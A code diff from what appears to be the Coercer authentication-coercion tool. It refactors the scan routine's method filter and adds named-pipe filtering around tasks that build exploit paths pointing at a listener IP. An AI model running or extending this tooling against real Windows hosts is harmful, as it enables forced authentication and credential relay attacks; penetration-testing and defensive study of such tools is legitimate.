@@ -6,7 +6,7 @@
 
 
 import time
-from coercer.core.MethodFilter import MethodFilter
+from coercer.core.Filter import Filter
 from coercer.core.utils import generate_exploit_path_from_template
 from coercer.network.DCERPCSession import DCERPCSession
 from coercer.structures.TestResult import TestResult
@@ -18,9 +18,10 @@ from coercer.network.utils import get_ip_addr_to_listen_on, get_next_http_listen
 def action_scan(target, available_methods, options, credentials, reporter):
     http_listen_port = 0
 
-    method_filter = MethodFilter(
+    filter = Filter(
         filter_method_name=options.filter_method_name,
-        filter_protocol_name=options.filter_protocol_name
+        filter_protocol_name=options.filter_protocol_name,
+        filter_pipe_name=options.filter_pipe_name
     )
 
     # Preparing tasks ==============================================================================================================
@@ -31,7 +32,7 @@ def action_scan(target, available_methods, options, credentials, reporter):
             for method in sorted(available_methods[method_type][category].keys()):
                 instance = available_methods[method_type][category][method]["class"]
 
-                if method_filter.matches_filter(instance):
+                if filter.method_matches_filter(instance):
                     for access_type, access_methods in instance.access.items():
                         if access_type not in tasks.keys():
                             tasks[access_type] = {}
@@ -40,17 +41,18 @@ def action_scan(target, available_methods, options, credentials, reporter):
                         if access_type == "ncan_np":
                             for access_method in access_methods:
                                 namedpipe, uuid, version = access_method["namedpipe"], access_method["uuid"], access_method["version"]
-                                if namedpipe not in tasks[access_type].keys():
-                                    tasks[access_type][namedpipe] = {}
+                                if filter.pipe_matches_filter(namedpipe):
+                                    if namedpipe not in tasks[access_type].keys():
+                                        tasks[access_type][namedpipe] = {}
 
-                                if uuid not in tasks[access_type][namedpipe].keys():
-                                    tasks[access_type][namedpipe][uuid] = {}
+                                    if uuid not in tasks[access_type][namedpipe].keys():
+                                        tasks[access_type][namedpipe][uuid] = {}
 
-                                if version not in tasks[access_type][namedpipe][uuid].keys():
-                                    tasks[access_type][namedpipe][uuid][version] = []
+                                    if version not in tasks[access_type][namedpipe][uuid].keys():
+                                        tasks[access_type][namedpipe][uuid][version] = []
 
-                                if instance not in tasks[access_type][namedpipe][uuid][version]:
-                                    tasks[access_type][namedpipe][uuid][version].append(instance)
+                                    if instance not in tasks[access_type][namedpipe][uuid][version]:
+                                        tasks[access_type][namedpipe][uuid][version].append(instance)
 
     # Executing tasks =======================================================================================================================
 
@@ -78,6 +80,7 @@ def action_scan(target, available_methods, options, credentials, reporter):
                                     continue
                                 if listener_type == "http":
                                     http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
+
                                 exploitpath = generate_exploit_path_from_template(
                                     template=exploitpath,
                                     listener=listening_ip,
